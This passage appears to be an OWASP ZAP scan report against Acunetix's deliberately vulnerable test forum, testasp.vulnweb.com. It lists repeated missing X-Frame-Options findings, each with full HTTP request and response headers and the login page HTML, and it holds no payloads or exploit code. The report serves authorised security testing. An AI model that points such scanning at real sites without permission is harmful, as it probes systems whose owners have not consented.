name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 379 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3137 |
Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 369 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 3132 |
Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 369 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3132 |
Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 369 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 3132 |
Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 506 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:03:23 GMT Content-Length: 3218 |
Response Body - size: 3,218 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
